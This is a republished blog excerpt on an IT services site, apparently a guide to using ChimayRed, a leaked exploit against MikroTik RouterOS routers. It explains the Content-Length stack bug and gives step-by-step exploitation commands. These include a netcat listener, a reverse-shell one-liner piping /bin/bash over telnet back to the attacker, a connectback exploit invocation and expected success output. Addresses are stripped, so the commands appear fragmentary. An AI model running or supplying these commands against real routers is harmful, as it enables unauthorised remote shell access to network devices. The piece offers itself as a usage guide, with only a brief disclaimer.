Get in touch now on

+61 7 3480 5121

ChimayRed – Reverse engineering of Mikrotik exploits from Vault 7 CIA Leaks.
05 January, 2018
This post was originally published on this site


The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law, this script was build to show how resource files can automate tasks.

ChimayRed (CR) is an exploit that is used against MikroTik (MT) routers running RouterOS. It is used to upload a payload such as HIVE or TinyShell onto the MT router. This guide explains how to utilize ChimayRed to upload the TinyShell payload to the MikroTik router.

+ Python 2.7.x


What really happens?
+ The content_length_value is subtracted from the stack pointer register.
+ If we pass a big number bigger than 130000 and smaller than 2147483647 the stack pointer will point out of the stack, and the first PUSH will generate a SEGFAULT.
+ If we pass a negative number (or a number from 2147483648 [-2147483648] to 4294967295 [-1]), the space on the stack won’t be reserved because the stack pointer will be incremented instead of decremented.


git clone && cd Where: – RouterOS IP: – PC IP: nc -l -p 1234 ./ www_binary “/bin/mknod /ram/f p; /bin/telnet 1234 < /ram/f | /bin/bash > /ram/f 2>&1” or Step-by-step guide 1. Verify that the MikroTik is running RouterOS 6.X 2. Verify python version 2.7 is installed 3. Determine the ICON IP Address 4. Go to ChimayRed bin directory a. /home/ubuntu/Desktop/ChimayRed_v3.7/bin 5. Exploit RB 493G using ChimayRed. a. python -t connectback -l -p 4242 6. The following output should be observed, which confirms successfully exploitation: a. [+] Connecting to: b. [+] Detected RouterOS: 6.27 c. [+] Detected architecture: mipsbe d. [+] 0 seconds until Web server is reset. e. [+] Web server reset. f. [+] Connecting to

read more ...

What our
Clients say

Product Finder

Search for products that match of these criteria:

 + Add row
System Diagnostic

  • Do you have five or more computers?
  • Do you have a server?
  • Is your data critical to your business?
  • Do you think IT could perform better?
  • Are you concerned about your IT security?
  • Do you need to be kept up to date?
  • Would you like your IT maintained?
Product Finder

Search for products that match of these criteria:

 + Add row



Phone:07 3480 5121

Address: 8 - 37 Flinders Parade, North Lakes

QLD 4509 Australia

Post: PO Box 128, Burpengary

QLD 4505 Australia